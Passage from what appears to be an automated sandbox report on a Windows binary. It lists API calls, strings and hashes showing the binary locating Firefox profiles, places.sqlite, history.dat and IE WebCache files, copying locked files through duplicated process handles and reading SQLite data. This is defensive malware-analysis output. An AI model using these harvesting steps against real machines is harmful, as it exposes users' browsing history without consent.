                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                • API String ID: 4039892925-3369679110
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                • API String ID: 3510742995-2641926074
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 004033B7
                                • memcpy.MSVCRT ref: 004033D0
                                • wcscmp.MSVCRT ref: 004033FC
                                • _wcsicmp.MSVCRT ref: 00403439
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                • String ID: $0.@
                                • API String ID: 3030842498-1896041820
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 2941347001-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00403C09
                                • memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                • wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • wcscat.MSVCRT ref: 00403C70
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 1534475566-1174173950
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • memset.MSVCRT ref: 00414C87
                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 71295984-2036018995
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcschr.MSVCRT ref: 00414458
                                • _snwprintf.MSVCRT ref: 0041447D
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                • String ID: "%s"
                                • API String ID: 1343145685-3297466227
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressHandleModuleProcProcessTimes
                                • String ID: GetProcessTimes$kernel32.dll
                                • API String ID: 1714573020-3385500049
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcmp
                                • String ID: @ $SQLite format 3
                                • API String ID: 1475443563-3708268960
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _wcsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 1579243037-1578091866
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040E60F
                                • memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Strings
                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                • API String ID: 2887208581-2114579845
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset
                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                • API String ID: 2221118986-1725073988
                                • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ChangeCloseFindNotificationSleep
                                • String ID: }A
                                • API String ID: 1821831730-2138825249
                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@DeleteObject
                                • String ID: r!A
                                • API String ID: 1103273653-628097481
                                • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                • memcmp.MSVCRT ref: 00444BA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$memcmp
                                • String ID: $$8
                                • API String ID: 2808797137-435121686
                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                • duplicate column name: %s, xrefs: 004307FE
                                • too many columns on %s, xrefs: 00430763
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID:
                                • String ID: duplicate column name: %s$too many columns on %s
                                • API String ID: 0-1445880494
                                • Opcode ID: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                • Opcode Fuzzy Hash: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                • String ID:
                                • API String ID: 2722907921-0
                                • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                • memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                • String ID: history.dat$places.sqlite
                                • API String ID: 3093078384-467022611
                                • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B1D1: wcslen.MSVCRT ref: 0040B1DE
                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                  • Part of subcall function 0040B1D1: memcpy.MSVCRT ref: 0040B248
                                • memset.MSVCRT ref: 0040B32F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B432,000000FF,?,00000FFF,00000000,00000000,0040B432,00000000,-00000002,0040B626,00000000), ref: 0040B348
                                  • Part of subcall function 0040B0D1: strlen.MSVCRT ref: 0040B0D8
                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                  • Part of subcall function 0040B0D1: memcpy.MSVCRT ref: 0040B159
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B36F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                • String ID:
                                • API String ID: 1562205978-0
                                • Opcode ID: 17909df3817d9cebc6fd13d723ff7355e8b74d0ee5d722764330b7a6cef48d19
                                • Instruction ID: b857a4007f161fa5246434627f102fbdc01d58e76d807d6b79cc7eff8a49146b
                                • Opcode Fuzzy Hash: 17909df3817d9cebc6fd13d723ff7355e8b74d0ee5d722764330b7a6cef48d19
                                • Instruction Fuzzy Hash: 18212771900218BFDB009B98EC44C9A37ACEB46329F10823BFC45A7292D7B8DD549B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                • GetLastError.KERNEL32 ref: 00417627
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ErrorLast$File$PointerRead
                                • String ID:
                                • API String ID: 839530781-0
                                • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                • Instruction ID: ab827e58211017b50a374ecff23b92c7d33c5c2594aefa3e9ea54b4f7b6580b8
                                • Opcode Fuzzy Hash: 7e1d4fae5655a69f0d9e255d5eea8c4cd8ca5fcd0e36236478752201c4e29ed9
                                • Instruction Fuzzy Hash: 6A0167B3904308AAFB24D791DD8AB9A73ACDB14714F5100BBA704E21C3EBBC9B45865D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: *.*$index.dat
                                • API String ID: 1974802433-2863569691
